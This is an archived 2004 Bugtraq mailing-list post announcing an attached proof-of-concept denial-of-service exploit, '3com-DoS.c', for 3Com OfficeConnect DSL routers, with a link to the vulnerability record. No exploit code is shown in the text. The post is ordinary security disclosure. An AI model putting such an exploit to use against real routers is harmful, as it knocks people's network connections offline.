[33909] in bugtraq
3Com DSL Router Long Request DoS exploit.
daemon@ATHENA.MIT.EDU (Shaun Colley)
Mon Feb 23 16:33:44 2004
Message-ID: <20040222184855.36052.qmail@web25106.mail.ukl.yahoo.com>
Date: Sun, 22 Feb 2004 18:48:55 +0000 (GMT)
From: Shaun Colley <shaunige@yahoo.co.uk>
To: bugtraq@securityfocus.com
I have attached a PoC exploit for the DoS
vulnerability on 3Com OfficeConnect DSL routers,
discovered by David F. Madrid.
(Vulnerability documented here:
<http://www.securityfocus.com/bid/8248/>)

Thank you for your time.

Shaun.
[Attachment: 3com-DoS.c]